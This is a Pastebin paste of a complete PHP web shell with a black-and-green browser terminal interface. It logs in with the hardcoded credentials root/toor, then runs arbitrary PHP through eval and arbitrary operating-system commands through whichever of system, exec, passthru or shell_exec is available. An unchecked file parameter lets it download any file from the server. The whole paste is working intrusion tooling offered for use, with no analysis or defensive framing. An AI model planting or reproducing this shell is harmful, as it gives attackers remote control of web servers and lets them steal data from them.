Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- session_start();
- $config_command_prefix = "$";
- $config_username = "root";
- $config_password = "toor";
- $config_welcome = "<br />Welcome! (type help if you are lost)<br />";
- $config_file = basename(__FILE__);
- $config_command_prefix = '<span class="prefix">' . $config_command_prefix . '</span>';
- if($_SESSION['terminal']['loggedin'] && isset($_GET['file'])){
- $file = trim($_GET['file']);
- header('Content-Description: File Transfer');
- header('Content-Disposition: attachment; filename='.basename($file));
- header('Content-Length: ' . filesize($file));
- readfile($file);
- exit();
- }
- if(isset($_POST['action'])){
- switch($_POST['action']){
- case 'command':
- if(isset($_POST['command'])){
- $command = trim(str_replace($config_command_prefix, '', $_POST['command']));
- $data['command'] = $command;
- $data['color_command'] = color_command($command);
- if(strstr($command, 'exit')){
- session_destroy();
- $data['result'] = "You are know logged out \n";
- response($data, 220);
- }
- if(strstr($_POST['line'], 'username: ')){
- $user = trim(str_replace('username: ', '', $command));
- if($user == $config_username){
- $_SESSION['terminal']['username'] = $user;
- response($data, 300);
- }else{
- response($data, 310, "Incorrect username");
- }
- }
- if(strstr($_POST['line'], 'password: ')){
- $pass = trim(str_replace('password: ', '', $command));
- if($pass == $config_password){
- $_SESSION['terminal']['password'] = $pass;
- $_SESSION['terminal']['loggedin'] = true;
- response($data, 320);
- }else{
- response($data, 330, "Incorrect password");
- }
- }
- if(!isset($_SESSION['terminal']['loggedin']) && !$_SESSION['terminal']['loggedin']){
- response($data, 400, "Permission denied");
- }
- if(strstr($command, 'cd ')){
- $path = trim(str_replace('cd ', '', $command));
- $_SESSION['terminal']['path'] = compress_path($_SESSION['terminal']['path'] . '/' . $path);
- $data['result'] = "";
- $data['path'] = $_SESSION['terminal']['path'];
- response($data);
- }
- if(strstr($command, 'func ')){
- $function = trim(str_replace('func ', '', $command));
- $data['result'] = function_exists( $function ) ? "exist" : "doesn't exist";
- response($data);
- }
- if(strstr($command, 'exec ')){
- $code = trim(str_replace('exec ', '', $command));
- ob_start();
- eval($code);
- $content = ob_get_contents();
- ob_clean();
- $data['result'] = $content;
- response($data);
- }
- if($command != ""){
- $data['result'] = execute($command, $_SESSION['terminal']['function']);
- response($data);
- }else{
- response($data, 400, 'Empty command');
- }
- }
- break;
- case 'init':
- if(!isset($_SESSION['terminal']['function']) || $_SESSION['terminal']['function'] == ''){
- $commander = getValidCommandFunction();
- $_SESSION['terminal']['function'] = $commander;
- }
- sleep(1);
- $data['commander'] = $commander;
- $data['loggedin'] = isset($_SESSION['terminal']['loggedin']) && $_SESSION['terminal']['loggedin'] ? true : false;
- response($data);
- break;
- }
- exit();
- }
- function response($data, $code=200, $error=""){
- $response['code'] = $code;
- $response['error'] = $error;
- $response['data'] = $data;
- echo json_encode($response);
- exit();
- }
- function isWindows(){
- ob_start();
- phpinfo();
- $phpinfo = ob_get_clean();
- return preg_match('~System </td><td class="v">([^<]*Windows)~',$phpinfo) ? true : false;
- }
- function getValidCommandFunction(){
- $test_command = isWindows() ? 'dir' : 'ls';
- ob_start();
- system($test_command);
- $result = ob_get_contents();
- ob_end_clean();
- if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'system';
- $result = exec($test_command);
- if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'exec';
- ob_start();
- passthru($test_command);
- $result = ob_get_contents();
- ob_end_clean();
- if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'passthru';
- $result = shell_exec($test_command);
- if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'shell_exec';
- }
- function execute($command, $function, $n_to_br=true){
- $chdir = '';
- if($_SESSION['terminal']['path'] != ''){
- if(isWindows()){
- if(!@chdir( $_SESSION['terminal']['path'] )){
- $_SESSION['terminal']['path'] = '';
- $data['result'] = "You are redirected back to the original directory, because it was not allowed to open this directory.";
- response($data);
- }
- }else{
- $chdir = "cd " . $_SESSION['terminal']['path'] . "\n";
- }
- }
- switch($function){
- case 'system':
- ob_start();
- system($chdir . $command);
- $result = ob_get_contents();
- ob_end_clean();
- break;
- case 'exec':
- $result = exec($chdir . $command);
- break;
- case 'passthru':
- ob_start();
- passthru($chdir . $command);
- $result = ob_get_contents();
- ob_end_clean();
- break;
- case 'shell_exec':
- $result = shell_exec($chdir . $command);
- break;
- default:
- $result = false;
- break;
- }
- return $n_to_br ? nl2br( htmlspecialchars( $result )) : htmlspecialchars($result);
- }
- function compress_path($path){
- $clean = str_replace('\\', '/', $path);
- $clean = str_replace(array('////', '///', '//'), '/', $clean);
- if(substr($clean, 0, 1) == "/") $clean = substr($clean, 1);
- return $clean;
- }
- function color_command($command){
- $parts = explode(' ', $command);
- $parts[0] = '<span class="keyword">' . $parts[0] . '</span>';
- return implode(' ', $parts);
- }
- ?>
- <html>
- <head>
- <title>Shell</title>
- <meta name="viewport" content="width=device-width">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
- <style>
- body{
- text-align: center;
- font-size: 11px;
- font-family: verdana;
- background-color: #000000;
- }
- table {
- width: 565px;
- }
- table tr td{
- font-family: verdana;
- font-size: 11px;
- padding: 10px 5px;
- border-bottom: solid 1px #000000;
- }
- #wrapper{
- width: 100%;
- margin: 2% auto;
- text-align: left;
- }
- #console{
- height: 84%;
- overflow: auto;
- background-color: #000000;
- padding: 15px;
- font-family: monospace;
- font-size: 12px;
- color: #1fbf00;
- }
- .content{
- padding: 15px;
- }
- #commander{
- border: solid 1px #000000;
- padding: 5px 10px;
- -webkit-border-radius: 2px;
- -moz-border-radius: 2px;
- border-radius: 2px;
- width: 100%;
- font-family: monospace;
- font-size: 12px;
- color: #1fbf00;
- }
- .box{
- -moz-box-shadow: 1px 1px 8px #000000;
- -webkit-box-shadow: 1px 1px 8px #000000;
- box-shadow: 1px 1px 8px #000000;
- border: solid 1px #000000;
- -webkit-border-radius: 4px;
- -moz-border-radius: 4px;
- border-radius: 4px;
- margin: 15px 0px;
- background-color: #000000;
- }
- #help{
- width: 300px;
- float: right;
- }
- .prefix{
- color: #0077E7;
- }
- .keyword{
- color: #9eff63;
- }
- .error{
- color: #FF0000;
- }
- .spacer{
- clear: both;
- display: block;
- }
- </style>
- <script type="text/javascript">
- var config_command_prefix = '<?php echo $config_command_prefix ?>';
- var config_welcome = '<?php echo $config_welcome ?>';
- var command_stack = Array();
- var command_stack_position = 0;
- $(document).ready(function() {
- $.post("<?php echo $config_file; ?>", {action: 'init'}, function(response){
- var extra = response.data.loggedin ? ' Welcome! (type help if you are lost)' : ' username: ?';
- $("#console").html($("#console").html() + "<br />" + config_command_prefix + extra);
- $("#commander").attr('disabled', false);
- $("#commander").focus();
- }, "json");
- });
- function execute(field,event) {
- var theCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode;
- if(theCode == 38){
- if(command_stack_position > 0) command_stack_position--;
- $("#commander").val(command_stack[command_stack_position]);
- }else if(theCode == 40){
- if(command_stack_position < (command_stack.length-1)) command_stack_position++;
- $("#commander").val(command_stack[command_stack_position]);
- }else if (theCode == 13){
- var command = $("#commander").val();
- $("#commander").val('');
- command_stack.push( command );
- command_stack_position = (command_stack.length);
- var lines = $("#console").html().toLowerCase().split('<br>');
- var line = lines[lines.length-1];
- if(command.indexOf("download") > -1){
- var file = command.replace('download ', '');
- window.location = '<?php echo $config_file; ?>?file=' + file;
- return;
- }
- if(command.indexOf("cls") == 0 || command.indexOf("clear") == 0){
- $("#console").html("");
- return;
- }
- $.post("<?php echo $config_file; ?>", {action: 'command', command: command, line: line}, function(response){
- if(response.code == 200){
- show = (response.data.result == null) ? "" : response.data.result + "<br />";
- result = config_command_prefix + " " + response.data.color_command + "<br />" + show;
- }else if(response.code == 220){
- window.location = '<?php echo $config_file; ?>';
- }else if(response.code == 310){
- result = response.error + "<br />" + config_command_prefix + " username: ?";
- }else if(response.code == 320){
- result = config_welcome + "<br />" + config_command_prefix + " ";
- }else if(response.code == 330){
- result = response.error + "<br />" + config_command_prefix + " password: ?";
- }else if(response.code == 300){
- result = config_command_prefix + " password: ?";
- }else{
- result = '<span class="error">' + response.error + "</span><br />";
- }
- $("#console").html($("#console").html() + '<br />' + result ).focus();
- textareaelem = document.getElementById('console');
- textareaelem.scrollTop = textareaelem.scrollHeight;
- $("#commander").focus();
- }, "json");
- return false;
- }else{
- return true;
- }
- }
- </script>
- </head>
- <body>
- <div id="wrapper">
- <div class="box">
- <div id="console"><?php echo $config_command_prefix ?> Loading......</div>
- <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="background-color:#000000;" />
- </div>
- <div class="spacer"></div>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement